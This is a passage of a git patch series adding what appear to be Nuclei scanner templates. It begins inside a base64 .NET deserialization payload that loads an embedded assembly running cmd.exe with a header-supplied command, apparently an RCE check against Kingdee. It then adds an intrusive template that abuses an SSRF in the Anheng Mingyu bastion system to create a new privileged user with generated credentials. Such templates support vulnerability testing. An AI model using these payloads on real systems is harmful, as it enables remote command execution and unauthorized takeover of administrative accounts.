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xlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=","format":"3"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Windows IP" + - "Kingdee.BOS.Core.Metadata.BusinessInfo" + condition: and + + - type: status + status: + - 200 From d959a32cfa7579bd98b31ea2a257962f716c890d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 6 Sep 2023 13:07:08 +0530 Subject: [PATCH 0171/1090] Create mingyu-xmlrpc-sock-adduser.yaml --- .../mingyu-xmlrpc-sock-adduser.yaml | 123 ++++++++++++++++++ 1 file changed, 123 insertions(+) create mode 100644 http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml diff --git a/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml b/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml new file mode 100644 index 0000000000..4fba149fca --- /dev/null +++ b/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml @@ -0,0 +1,123 @@ +id: mingyu-xmlrpc-sock-adduser + +info: + name: Mingyu Operation xmlrpc.sock - User Addition + author: SleepingBag945 + severity: high + description: | + There is an SSRF vulnerability in the xmlrpc.sock interface of Anheng Mingyu operation and maintenance audit and risk control system, through which any user can be added to control the bastion machine + reference: + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/dbappsecurity-mingyu-xmlrpc-sock-adduser.yaml + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%AE%89%E6%81%92/%E5%AE%89%E6%81%92%20%E6%98%8E%E5%BE%A1%E8%BF%90%E7%BB%B4%E5%AE%A1%E8%AE%A1%E4%B8%8E%E9%A3%8E%E9%99%A9%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%BB%9F%20xmlrpc.sock%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + verified: true + fofa-query: "明御运维审计与风险控制系统" + tags: mingyu,xmlrpc,sock,intrusive,user-add + +variables: + username: "{{rand_base(6)}}" + password: "{{rand_base(8)}}" + random: "{{rand_base(4)}}" + +http: + - raw: + - | + POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://{{random}}/wsrpc HTTP/1.1 + Host: {{Hostname}} + + + + web.user_add + + + + + + + admin + + + 5 + + + 10.0.0.1 + + + + + + + + + + uname + + {{username}} + + + + name + + {{username}} + + + + pwd + + {{password}} + + + + authmode + + 1 + + + + deptid + + + + + + email + + + + + + mobile + + + + + + comment + + + + + + roleid + + 102 + + + + + + + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/xml") && contains(body, "rolename") && contains(body, "authmode")' + condition: and + + extractors: + - type: dsl + dsl: + - '"USERNAME: "+ username' + - '"PASSWORD: "+ password' From 1db3eea79f3dde2d5fd3f02211b49bedcdc6a0fe Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 6 Sep 2023 13:09:50 +0530 Subject: [PATCH 0172/1090] trailspace fix --- http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml b/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml index 4fba149fca..7dba143cc2 100644 --- a/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml +++ b/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml @@ -26,7 +26,7 @@ http: POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://{{random}}/wsrpc HTTP/1.1 Host: {{Hostname}} - + web.user_add From 7834caa83606a79deed1d21b3b72ecdb510de410 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 08:27:06 +0000 Subject: [PATCH 0173/1090] Auto Generated New Template Addition List [Wed Sep 6 08:27:06 UTC 2023] :robot: 